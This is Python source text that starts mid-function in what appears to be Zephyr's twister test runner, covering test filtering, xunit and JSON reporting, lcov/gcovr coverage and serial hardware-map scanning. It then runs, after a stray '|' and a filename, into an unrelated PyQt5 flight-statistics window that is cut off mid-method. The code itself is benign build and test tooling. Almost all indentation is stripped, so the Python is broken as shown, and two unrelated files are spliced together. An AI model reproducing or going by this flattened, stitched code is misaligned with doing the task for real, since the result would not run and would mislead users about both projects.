discards[instance] = discards.get(instance, "Not in testsuite platform allow list")
if ts.platform_type and plat.type not in ts.platform_type:
discards[instance] = discards.get(instance, "Not in testsuite platform type list")
if ts.toolchain_allow and toolchain not in ts.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testsuite toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and "host" not in plat.supported_toolchains \
and ts.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < ts.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if ts.depends_on:
dep_intersection = ts.depends_on.intersection(set(plat.supported))
if dep_intersection != set(ts.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < ts.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & ts.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & ts.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
test_configuration = ".".join([instance.platform.name,
instance.testsuite.id])
# skip quarantined tests
if test_configuration in self.quarantine and not self.quarantine_verify:
discards[instance] = discards.get(instance,
f"Quarantine: {self.quarantine[test_configuration]}")
# run only quarantined test to verify their statuses (skip everything else)
if self.quarantine_verify and test_configuration not in self.quarantine:
discards[instance] = discards.get(instance, "Not under quarantine")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testsuite
if not instance_list:
continue
# if twister was launched with no platform options at all, we
# take all default platforms
if default_platforms and not ts.build_on_all and not integration:
if ts.platform_allow:
a = set(self.default_platforms)
b = set(ts.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda ts: ts.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list)
else:
instances = list(filter(lambda ts: ts.platform.default, instance_list))
self.add_instances(instances)
elif integration:
instances = list(filter(lambda item: item.platform.name in ts.integration_platforms, instance_list))
self.add_instances(instances)
elif emulation_platforms:
self.add_instances(instance_list)
                for instance in list(filter(lambda inst: inst.platform.simulation == 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
remove_from_discards = [] # configurations to be removed from discards.
for instance in self.discards:
instance.reason = self.discards[instance]
# If integration mode is on all skips on integration_platforms are treated as errors.
if self.integration and instance.platform.name in instance.testsuite.integration_platforms \
and "Quarantine" not in instance.reason:
instance.status = "error"
instance.reason += " but is one of the integration platforms"
self.instances[instance.name] = instance
# Such configuration has to be removed from discards to make sure it won't get skipped
remove_from_discards.append(instance)
else:
instance.status = "filtered"
instance.add_missing_testscases(instance.status)
# Remove from discards configurations that must not be discarded
# (e.g. integration_platforms when --integration was used)
for instance in remove_from_discards:
del self.discards[instance]
self.filtered_platforms = set(p.platform.name for p in self.instances.values()
if p.status != "skipped" )
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False, retry_build_errors=False):
for instance in self.instances.values():
if build_only:
instance.run = False
no_retry_statuses = ['passed', 'skipped', 'filtered']
if not retry_build_errors:
no_retry_statuses.append("error")
if instance.status not in no_retry_statuses:
logger.debug(f"adding {instance.name}")
instance.status = None
if test_only and instance.run:
pipeline.put({"op": "run", "test": instance})
else:
pipeline.put({"op": "cmake", "test": instance})
def pipeline_mgr(self, pipeline, done_queue, lock, results):
while True:
try:
task = pipeline.get_nowait()
except queue.Empty:
break
else:
test = task['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors,
overflow_as_errors=self.overflow_as_errors,
suite_name_check=self.suite_name_check,
seed=self.seed
)
pb.process(pipeline, done_queue, task, lock, results)
return True
def execute(self, pipeline, done, results):
lock = Lock()
logger.info("Adding tasks to the queue...")
self.add_tasks_to_queue(pipeline, self.build_only, self.test_only,
retry_build_errors=self.retry_build_errors)
logger.info("Added initial list of jobs to queue")
processes = []
for job in range(self.jobs):
logger.debug(f"Launch process {job}")
p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
processes.append(p)
p.start()
try:
for p in processes:
p.join()
except KeyboardInterrupt:
logger.info("Execution interrupted")
for p in processes:
p.terminate()
return results
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
@staticmethod
def xunit_testcase(eleTestsuite, name, classname, status, ts_status, reason, duration, runnable, stats, log, build_only_as_skip):
fails, passes, errors, skips = stats
if status in ['skipped', 'filtered']:
duration = 0
eleTestcase = ET.SubElement(
eleTestsuite, "testcase",
classname=classname,
name=f"{name}",
time=f"{duration}")
if status in ['skipped', 'filtered']:
skips += 1
# temporarily add build_only_as_skip to restore existing CI report behaviour
if ts_status == "passed" and not runnable:
tc_type = "build"
else:
tc_type = status
ET.SubElement(eleTestcase, 'skipped', type=f"{tc_type}", message=f"{reason}")
elif status in ["failed", "blocked"]:
fails += 1
el = ET.SubElement(eleTestcase, 'failure', type="failure", message=f"{reason}")
if log:
el.text = log
elif status == "error":
errors += 1
el = ET.SubElement(eleTestcase, 'error', type="failure", message=f"{reason}")
if log:
el.text = log
elif status == 'passed':
if not runnable and build_only_as_skip:
ET.SubElement(eleTestcase, 'skipped', type="build", message="built only")
skips += 1
else:
passes += 1
else:
if not status:
logger.debug(f"{name}: No status")
ET.SubElement(eleTestcase, 'skipped', type=f"untested", message="No results captured, testsuite misconfiguration?")
else:
logger.error(f"{name}: Unknown status '{status}'")
return (fails, passes, errors, skips)
# Generate a report with all testsuites instead of doing this per platform
def xunit_report_suites(self, json_file, filename):
json_data = {}
with open(json_file, "r") as json_results:
json_data = json.load(json_results)
env = json_data.get('environment', {})
version = env.get('zephyr_version', None)
eleTestsuites = ET.Element('testsuites')
all_suites = json_data.get("testsuites", [])
suites_to_report = all_suites
# do not create entry if everything is filtered out
if not self.detailed_skipped_report:
suites_to_report = list(filter(lambda d: d.get('status') != "filtered", all_suites))
for suite in suites_to_report:
duration = 0
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=suite.get("name"), time="0",
timestamp = self.timestamp,
tests="0",
failures="0",
errors="0", skipped="0")
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
ET.SubElement(eleTSPropetries, 'property', name="platform", value=suite.get("platform"))
ET.SubElement(eleTSPropetries, 'property', name="architecture", value=suite.get("arch"))
total = 0
fails = passes = errors = skips = 0
handler_time = suite.get('execution_time', 0)
runnable = suite.get('runnable', 0)
duration += float(handler_time)
ts_status = suite.get('status')
for tc in suite.get("testcases", []):
status = tc.get('status')
reason = tc.get('reason', suite.get('reason', 'Unknown'))
log = tc.get("log", suite.get("log"))
tc_duration = tc.get('execution_time', handler_time)
name = tc.get("identifier")
classname = ".".join(name.split(".")[:2])
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, status, ts_status, reason, tc_duration, runnable,
(fails, passes, errors, skips), log, True)
total = (errors + passes + fails + skips)
eleTestsuite.attrib['time'] = f"{duration}"
eleTestsuite.attrib['failures'] = f"{fails}"
eleTestsuite.attrib['errors'] = f"{errors}"
eleTestsuite.attrib['skipped'] = f"{skips}"
eleTestsuite.attrib['tests'] = f"{total}"
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def xunit_report(self, json_file, filename, selected_platform=None, full_report=False):
if selected_platform:
selected = [selected_platform]
logger.info(f"Writing target report for {selected_platform}...")
else:
logger.info(f"Writing xunit report {filename}...")
selected = self.selected_platforms
json_data = {}
with open(json_file, "r") as json_results:
json_data = json.load(json_results)
env = json_data.get('environment', {})
version = env.get('zephyr_version', None)
eleTestsuites = ET.Element('testsuites')
all_suites = json_data.get("testsuites", [])
for platform in selected:
suites = list(filter(lambda d: d['platform'] == platform, all_suites))
# do not create entry if everything is filtered out
if not self.detailed_skipped_report:
non_filtered = list(filter(lambda d: d.get('status') != "filtered", suites))
if not non_filtered:
continue
duration = 0
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=platform,
timestamp = self.timestamp,
time="0",
tests="0",
failures="0",
errors="0", skipped="0")
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
total = 0
fails = passes = errors = skips = 0
for ts in suites:
handler_time = ts.get('execution_time', 0)
runnable = ts.get('runnable', 0)
duration += float(handler_time)
ts_status = ts.get('status')
# Do not report filtered testcases
if ts_status == 'filtered' and not self.detailed_skipped_report:
continue
if full_report:
for tc in ts.get("testcases", []):
status = tc.get('status')
reason = tc.get('reason', ts.get('reason', 'Unknown'))
log = tc.get("log", ts.get("log"))
tc_duration = tc.get('execution_time', handler_time)
name = tc.get("identifier")
classname = ".".join(name.split(".")[:2])
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, status, ts_status, reason, tc_duration, runnable,
(fails, passes, errors, skips), log, True)
else:
reason = ts.get('reason', 'Unknown')
name = ts.get("name")
classname = f"{platform}:{name}"
log = ts.get("log")
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, ts_status, ts_status, reason, duration, runnable,
(fails, passes, errors, skips), log, False)
total = (errors + passes + fails + skips)
eleTestsuite.attrib['time'] = f"{duration}"
eleTestsuite.attrib['failures'] = f"{fails}"
eleTestsuite.attrib['errors'] = f"{errors}"
eleTestsuite.attrib['skipped'] = f"{skips}"
eleTestsuite.attrib['tests'] = f"{total}"
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def json_report(self, filename, version="NA"):
logger.info(f"Writing JSON report {filename}")
report = {}
report["environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
suites = []
for instance in self.instances.values():
suite = {}
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
handler_time = instance.metrics.get('handler_time', 0)
ram_size = instance.metrics.get ("ram_size", 0)
rom_size = instance.metrics.get("rom_size",0)
suite = {
"name": instance.testsuite.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
}
if instance.run_id:
suite['run_id'] = instance.run_id
suite["runnable"] = False
if instance.status != 'filtered':
suite["runnable"] = instance.run
if ram_size:
suite["ram_size"] = ram_size
if rom_size:
suite["rom_size"] = rom_size
if instance.status in ["error", "failed"]:
suite['status'] = instance.status
suite["reason"] = instance.reason
# FIXME
if os.path.exists(handler_log):
suite["log"] = self.process_log(handler_log)
elif os.path.exists(device_log):
suite["log"] = self.process_log(device_log)
else:
suite["log"] = self.process_log(build_log)
elif instance.status == 'filtered':
suite["status"] = "filtered"
suite["reason"] = instance.reason
elif instance.status == 'passed':
suite["status"] = "passed"
elif instance.status == 'skipped':
suite["status"] = "skipped"
suite["reason"] = instance.reason
if instance.status is not None:
suite["execution_time"] = f"{float(handler_time):.2f}"
testcases = []
if len(instance.testcases) == 1:
single_case_duration = f"{float(handler_time):.2f}"
else:
single_case_duration = 0
for case in instance.testcases:
testcase = {}
testcase['identifier'] = case.name
if instance.status:
if single_case_duration:
testcase['execution_time'] = single_case_duration
else:
testcase['execution_time'] = f"{float(case.duration):.2f}"
if case.output != "":
testcase['log'] = case.output
if case.status == "skipped":
if instance.status == "filtered":
testcase["status"] = "filtered"
else:
testcase["status"] = "skipped"
testcase["reason"] = case.reason or instance.reason
else:
testcase["status"] = case.status
if case.reason:
testcase["reason"] = case.reason
testcases.append(testcase)
suite['testcases'] = testcases
suites.append(suite)
report["testsuites"] = suites
with open(filename, "wt") as json_file:
json.dump(report, json_file, indent=4, separators=(',',':'))
def get_testsuite(self, identifier):
results = []
for _, ts in self.testsuites.items():
for case in ts.testcases:
if case == identifier:
results.append(ts)
return results
def verify_platforms_existence(self, platform_names_to_verify, log_info=""):
"""
        Verify that each platform name (passed by the --platform option, or in a yaml file
        as platform_allow or integration_platforms options) is valid. If not,
        log an error and exit.
"""
for platform in platform_names_to_verify:
            if platform not in self.platform_names:
                logger.error(f"{log_info} - unrecognized platform - {platform}")
                sys.exit(2)
def create_build_dir_links(self):
"""
        Iterate through all non-skipped instances in the suite and create a link
        for each instance's build directory. Those links will be passed to the
        CMake command in the next steps.
"""
links_dir_name = "twister_links" # folder for all links
links_dir_path = os.path.join(self.outdir, links_dir_name)
if not os.path.exists(links_dir_path):
os.mkdir(links_dir_path)
for instance in self.instances.values():
if instance.status != "skipped":
self._create_build_dir_link(links_dir_path, instance)
def _create_build_dir_link(self, links_dir_path, instance):
"""
        Create the build directory with its original "long" path, then create a
        shorter link path pointing at it and replace build_dir with that link.
        The link is what gets passed to the CMake command. This helps to limit
        the path length, which can be significant when building with CMake on
        Windows.
"""
os.makedirs(instance.build_dir, exist_ok=True)
link_name = f"test_{self.link_dir_counter}"
link_path = os.path.join(links_dir_path, link_name)
if os.name == "nt": # if OS is Windows
command = ["mklink", "/J", f"{link_path}", f"{instance.build_dir}"]
subprocess.call(command, shell=True)
else: # for Linux and MAC OS
os.symlink(instance.build_dir, link_path)
# Here original build directory is replaced with symbolic link. It will
# be passed to CMake command
instance.build_dir = link_path
self.link_dir_counter += 1
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
logger.debug(f"Select {tool} as the coverage tool...")
return t
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
            # if kobject_hash is given for coverage, gcovr fails;
            # hence skip it (problem only in gcovr v4.1)
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
cmd = ["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
coveragefile, outdir]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class DUT(object):
def __init__(self,
id=None,
serial=None,
serial_baud=None,
platform=None,
product=None,
serial_pty=None,
connected=False,
runner_params=None,
pre_script=None,
post_script=None,
post_flash_script=None,
runner=None):
self.serial = serial
self.baud = serial_baud or 115200
self.platform = platform
self.serial_pty = serial_pty
self._counter = Value("i", 0)
self._available = Value("i", 1)
self.connected = connected
self.pre_script = pre_script
self.id = id
self.product = product
self.runner = runner
self.runner_params = runner_params
self.fixtures = []
self.post_flash_script = post_flash_script
self.post_script = post_script
self.pre_script = pre_script
self.probe_id = None
self.notes = None
self.lock = Lock()
self.match = False
@property
def available(self):
with self._available.get_lock():
return self._available.value
@available.setter
def available(self, value):
with self._available.get_lock():
self._available.value = value
@property
def counter(self):
with self._counter.get_lock():
return self._counter.value
@counter.setter
def counter(self, value):
with self._counter.get_lock():
self._counter.value = value
def to_dict(self):
d = {}
exclude = ['_available', '_counter', 'match']
v = vars(self)
for k in v.keys():
if k not in exclude and v[k]:
d[k] = v[k]
return d
def __repr__(self):
return f"<{self.platform} ({self.product}) on {self.serial}>"
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.duts = []
def add_device(self, serial, platform, pre_script, is_pty, baud=None):
device = DUT(platform=platform, connected=True, pre_script=pre_script, serial_baud=baud)
if is_pty:
device.serial_pty = serial
else:
device.serial = serial
self.duts.append(device)
def load(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
duts = scl.yaml_load_verify(map_file, hwm_schema)
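        # Each map entry is a mapping like (illustrative values):
        #   - platform: frdm_k64f
        #     id: "000123456789"
        #     product: DAPLink CMSIS-DAP
        #     runner: pyocd
        #     serial: /dev/ttyACM0
        #     baud: 115200
        #     connected: true
        #     fixtures: [fixture_display]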
for dut in duts:
pre_script = dut.get('pre_script')
post_script = dut.get('post_script')
post_flash_script = dut.get('post_flash_script')
platform = dut.get('platform')
id = dut.get('id')
runner = dut.get('runner')
runner_params = dut.get('runner_params')
serial_pty = dut.get('serial_pty')
serial = dut.get('serial')
baud = dut.get('baud', None)
product = dut.get('product')
fixtures = dut.get('fixtures', [])
            connected = dut.get('connected') and ((serial or serial_pty) is not None)
new_dut = DUT(platform=platform,
product=product,
runner=runner,
runner_params=runner_params,
id=id,
serial_pty=serial_pty,
serial=serial,
serial_baud=baud,
connected=connected,
pre_script=pre_script,
post_script=post_script,
post_flash_script=post_flash_script)
new_dut.fixtures = fixtures
new_dut.counter = 0
self.duts.append(new_dut)
def scan(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
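            # For example (illustrative device names):
            #   /dev/ttyACM0 -> /dev/serial/by-id/usb-SEGGER_J-Link_000123456789-if00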
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = DUT(platform="unknown",
id=d.serial_number,
serial=persistent_map.get(d.device, d.device),
product=d.product,
runner='unknown',
connected=True)
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev.runner = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev.runner = runner
s_dev.connected = True
s_dev.lock = None
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def save(self, hwm_file):
# use existing map
self.detected.sort(key=lambda x: x.serial or '')
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
if hwm:
hwm.sort(key=lambda x: x.get('id', ''))
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for _detected in self.detected:
for h in hwm:
if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
h['connected'] = True
h['serial'] = _detected.serial
_detected.match = True
new_duts = list(filter(lambda d: not d.match, self.detected))
new = []
for d in new_duts:
new.append(d.to_dict())
if hwm:
hwm = hwm + new
else:
hwm = new
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
self.load(hwm_file)
logger.info("Registered devices:")
self.dump()
else:
# create new file
dl = []
for _connected in self.detected:
platform = _connected.platform
id = _connected.id
runner = _connected.runner
serial = _connected.serial
product = _connected.product
d = {
'platform': platform,
'id': id,
'runner': runner,
'serial': serial,
'product': product,
'connected': _connected.connected
}
dl.append(d)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(detected=True)
def dump(self, filtered=[], header=[], connected_only=False, detected=False):
print("")
table = []
if detected:
to_show = self.detected
else:
to_show = self.duts
if not header:
header = ["Platform", "ID", "Serial device"]
for p in to_show:
platform = p.platform
connected = p.connected
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.id, p.serial])
print(tabulate(table, headers=header, tablefmt="github"))
def init(colorama_strip):
colorama.init(strip=colorama_strip)
|
main_window.py
|
from PyQt5 import QtWidgets as QtW
from PyQt5.QtGui import QCursor
from PyQt5.QtCore import Qt
from .widgets.time_bar_widget import TimeBarWidget
from datetime import datetime
from threading import Thread
from time import sleep
from math import ceil
from settings import Settings
from .new_flight_window import NewFlightWindow
from .pending_flights_window import PendingFlightsWindow
from .close_confirmation_window import CloseConfirmationWindow
from .total_stats_window import TotalStatsWindow
from database import FlightStatistics
from openpyxl import load_workbook
class MainWindow(QtW.QWidget):
def __init__(self):
super().__init__()
self.__layout = QtW.QGridLayout()
self.__saved_flights_layout = QtW.QGridLayout()
self.__group_box = QtW.QGroupBox()
self.__clock = QtW.QLabel('00:00')
self.__clock.setProperty('color', 'color_vlight')
self.__layout.addWidget(self.__clock, 0, 0)
self.__row_count = 0
for i in range(24):
self.__layout.addWidget(QtW.QLabel(f'{i}:00'), 0, i+1)
self.render_flights()
self.__label_status = QtW.QLabel('READY')
self.__label_status.setProperty('color', 'color_green')
self.__layout.addWidget(self.__label_status, 0, 25)
self.__group_box.setLayout(self.__saved_flights_layout)
self.__scroll_area = QtW.QScrollArea()
self.__scroll_area.setWidget(self.__group_box)
self.__scroll_area.setWidgetResizable(True)
self.__scroll_area.setFixedHeight(400)
self.__layout.addWidget(self.__scroll_area, 1, 0, 1, 26)
button_new_flight = QtW.QPushButton('New flight', self)
button_show_pending = QtW.QPushButton('Show pending', self)
button_stats = QtW.QPushButton('Show total', self)
button_import = QtW.QPushButton('Import', self)
button_import.pressed.connect(self.__import_data)
button_new_flight.setCursor(QCursor(Qt.PointingHandCursor))
button_show_pending.setCursor(QCursor(Qt.PointingHandCursor))
button_stats.setCursor(QCursor(Qt.PointingHandCursor))
button_import.setCursor(QCursor(Qt.PointingHandCursor))
self.__layout.addWidget(button_new_flight, 2, 0, 1, 3)
self.__layout.addWidget(button_show_pending, 2, 3, 1, 3)
self.__layout.addWidget(button_stats, 2, 6, 1, 3)
self.__layout.addWidget(button_import, 2, 9, 1, 3)
label_copyright = QtW.QLabel(f'© {datetime.now().year} osx11')
label_copyright.setProperty('color', 'color_vlight')
self.__layout.addWidget(label_copyright, 2, 24, 1, 2)
Thread(target=self.__update_clock, daemon=True).start()
self.__new_flight_window = NewFlightWindow()
button_new_flight.clicked.connect(self.__new_flight_window.show)
self.__pending_flights_window = PendingFlightsWindow(self)
button_show_pending.clicked.connect(self.__show_pending_flights_window)
self.__total_stats_window = TotalStatsWindow()
button_stats.clicked.connect(self.__show_total_stats_window)
self.__close_confirmation_window = CloseConfirmationWindow(self)
self.setFixedSize(1300, 505)
self.setWindowTitle('Flight Statistics')
self.setLayout(self.__layout)
self.setStyleSheet(Settings().style)
self.show()
def set_status(self, status, color='color_green'):
self.__label_status.setText(status)
self.__label_status.setProperty('color', color)
self.__label_status.style().polish(self.__label_status)
def __clear_saved_flights_layout(self):
for i in reversed(range(self.__saved_flights_layout.count())):
self.__saved_flights_layout.itemAt(i).widget().setParent(None)
        # this has to be filled with empty labels, otherwise the time bars will be displayed incorrectly
for i in range(25):
self.__saved_flights_layout.addWidget(QtW.QLabel(''), 0, i)
def render_flights(self):
self.__clear_saved_flights_layout()
query = (FlightStatistics
.select()
.where(FlightStatistics.actual_arrival_time != None))
self.__row_count = query.count()
previous_pos_was_nextday = False
pos = 0
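        # Each flight occupies one grid row; a flight that lands after midnight is drawn as
        # two bars: one on the departure-day row and one on the following row starting at 00:00.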
for flight in query:
departure_date = flight.scheduled_departure_date[:5]
arrival_date = flight.actual_arrival_date[:5]
actual_departure_hour = int(flight.actual_departure_time[:2])
actual_arrival_hour = int(flight.actual_arrival_time[:2])
flight_time = ceil(float(flight.flight_time[:2]) + float(flight.flight_time[-2:])/60)
if actual_departure_hour == 0:
actual_departure_hour = 1
if actual_arrival_hour == 0:
actual_arrival_hour += 1
if flight_time == 0:
flight_time = 1
            # Compare the full stored dates ('%d.%m.%y', as written by __import_data) rather
            # than the 'dd.mm' labels, so month/year rollovers are detected correctly.
            arrived_next_day = (datetime.strptime(flight.actual_arrival_date, '%d.%m.%y')
                                > datetime.strptime(flight.scheduled_departure_date, '%d.%m.%y'))
no_distance = flight.distance == 0
